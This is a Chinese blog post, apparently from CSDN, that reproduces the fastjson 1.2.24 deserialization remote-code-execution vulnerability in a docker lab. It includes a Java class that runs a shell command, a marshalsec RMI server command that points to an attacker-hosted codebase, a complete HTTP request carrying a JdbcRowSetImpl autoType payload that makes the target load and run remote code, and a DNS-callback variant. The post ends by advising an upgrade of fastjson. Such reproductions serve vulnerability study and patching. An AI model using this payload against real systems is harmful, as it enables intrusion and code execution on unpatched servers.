fastjson 1.2.24反序列化漏洞复现

最新推荐文章于 2024-06-24 23:59:21 发布
最新推荐文章于 2024-06-24 23:59:21 发布
阅读量3.7k 收藏 2
点赞数 1
分类专栏: 渗透测试 文章标签: 安全漏洞 java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/105016535
版权

简介

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。
在Java 8u102环境下,没有com.sun.jndi.rmi.object.trustURLCodebase的限制,可以使用com.sun.rowset.JdbcRowSetImpl的利用链,借助JNDI注入来执行命令。

环境

  1. 靶机:http://192.168.3.105:8090,使用docker起的靶机:
    在这里插入图片描述

  2. 攻击者站点:http://192.168.3.105:8080,这里用的是tomcat(nginx或其他亦可),同样使用docker起,如上图:

  3. 攻击者RMI服务器:rmi://192.168.3.102:6666

注意:攻击者有两个服务端需要准备,分别是存放攻击代码的http://192.168.3.105:8080和rmi://192.168.3.102:6666

思路

攻击者通过RMI服务返回一个JNDI Naming Reference,受害者解码Reference时会去我们指定的Codebase远程地址(http://192.168.3.105:8080)加载Factory类,不受 java.rmi.server.useCodebaseOnly 系统属性的限制,所以更加通用。

但是由于JDK 6u132, JDK 7u122, JDK 8u113 中Java提升了JNDI 限制了Naming/Directory服务中JNDI Reference远程加载Object Factory类的特性。系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 默认为false,即默认不允许从远程的Codebase加载Reference的工厂类(Factory Class)。
因此本文复现,基于Java 8u102环境,没有com.sun.jndi.rmi.object.trustURLCodebase的限制

漏洞复现

  1. 192.168.3.105:8080站点准备
  2. 在idea中编译以下代码,生成TouchFile.class文件,文件代码很简单,就是为了在/tmp目录下生成success文件:
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

在这里插入图片描述

  1. 通过docker起个tomcat,在tomcat的web目录/usr/local/tomcat/webapps/ROOT/下,放入刚刚编译好的TouchFile.class文件
    在这里插入图片描述

RMI服务器准备

(1)从https://github.com/mbechler/marshalsec 下载源码,进入marshalsec 目录,使用mvn clean package -DskipTests命令编译出marshalsec的jar包:
在这里插入图片描述
(2)进入上图marshalsec-0.0.3-SNAPSHOT.jar所在文件夹,执行java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.3.105:8080/#TouchFile" 6666
其中192.168.3.105:8080指向的就是放了恶意class的tomcat站点,#TouchFile指定是远程TouchFile类,最后的6666代表RMI服务监听的端口
在这里插入图片描述

攻击请求包构造

  1. 开bp截包,dataSourceName对应的值中指定指明rmi服务器的地址,其中Content-Type: application/json别忘了,靶机回500:
POST / HTTP/1.1
Accept: */*
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; NMTE)
Host: 192.168.3.105:8080
Connection: close
Content-Length: 165
Content-Type: application/json
Accept-Encoding: gzip, deflate

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.3.102:6666/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述

  1. rmi服务器可以看到成功收到请求,并请求http://192.168.3.105:8080/TouchFile.class:
    在这里插入图片描述
  2. tomcat日志中也可以看到请求成功:
    在这里插入图片描述
  3. /tmp目录下成功生成success文件
    在这里插入图片描述

通过DNS拿回显

在实际情况下,因为不可能会有受害机权限,往往不会通过创建文件方式来证明漏洞存在。一般常用方法是通过DNS拿回显。

  1. 命令直接换成ping
    在这里插入图片描述
  2. 同样jndi服务指向也要改下,对应tomcat的Dns.class记得放到对应目录下
    在这里插入图片描述
  3. dns回显成功拿到
    在这里插入图片描述

解决方案

将fastjson升级到最新版本

ATpiu
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4495
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
Fastjson反序列化漏洞
热门推荐
m0_67401761的博客
09-11 1万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
fastjson1.2.24反序列化RCE
最新发布
qq_61860998的博客
06-24 518
fastjson1.2.24反序列化RCE
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
fastJson1.2.24漏洞复现
@起风了的博客
05-06 735
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
fastjson反序列化漏洞
qq_56426046的博客
11-20 6940
在这个示例程序中先是构造了⼀个恶意类,然后调⽤toJSONString⽅法序列化对象写⼊@type,将 @type指定为⼀个恶意的类TestTempletaHello的类全名,当调⽤parse⽅法对TestTempletaHello类进⾏ 反序列化时,会调⽤恶意类的构造⽅法创建实例对象,因此恶意类TestTempletaHello中的静态代码块中 就会被执⾏。fastjson在解析json的过程中,⽀持使⽤autoType来实例化某⼀个具体的类,并调⽤该类的set/get⽅法 来访问属性。
Fastjson 反序列化漏洞
Cover-3321的博客
01-09 2570
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。黑客通过查找代码中的get方法,来远程加载恶意命令,即造成反序列化漏洞
告急!fastjson又被发现漏洞,这次危害可导致服务瘫痪!
Java后端技术
09-08 330
点击上方“Java后端技术”,选择“置顶或者星标”你关注的就是我关心的!本文来源:https://tinyurl.com/y53yanrw上一篇:不敢相信?System....
Java代码审计】Fastjson1.2.24漏洞分析
网络安全从业者的学习笔记
04-03 361
Fastjson是由阿里巴巴研发的一个java库,用来实现Java对象转换JSON格式以及JSON字符串转换为对象。 在Fastjson
FastJson反序列化漏洞(实验文章)
soldi_er的博客
11-25 620
文章目录Json数据格式FastJson类库Json的三个类库下载Jar压缩包Autotype功能参考 Json数据格式 JSON是一种轻量级的数据交换格式,全称:JavaScript 对象表示法(JavaScript Object Notation) 类比XML,你可以把JSON看作是一种存储数据的格式类型,一种数据规范。描述JSON格式数据的语法只是采用了JS对象字面量的表示方法,它独立于语言存在,只是在不同的编程语言中对这种数据类型的实现不同。 FastJson类库 Json的三个类库 Java处理J
反序列化渗透与攻防(四)之Fastjson反序列化漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-15 686
是一个阿里巴巴开源的一款使用Java语言编写的高性能功能完善的JSON库,通常被用于将Java Bean和JSON 字符串之间进行转换。它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。但是,从诞生之初,fastjson就多次被爆出存在反序列化漏洞。并且,每次都和autoType有关!那么,什么是autoType呢?
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2471
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化Java Bean。
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6549
fastjson1.2.24 RCE详细复现
Fastjson漏洞
weixin_43873557的博客
02-06 5195
Fastjson概述 Fastjson是阿里巴巴公司开源的一款json解析器,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 ➢历史漏洞 Fastjson <=1.2.24 反序列化远程命令执行漏洞 Fastjson <=1.2.41 反序列化远程命令执行漏洞 Fastjson <=1.2.42 反序列化远程命令执行漏洞 Fastjson <=1.2.43 反序列化远程命令执行漏洞
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全的JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值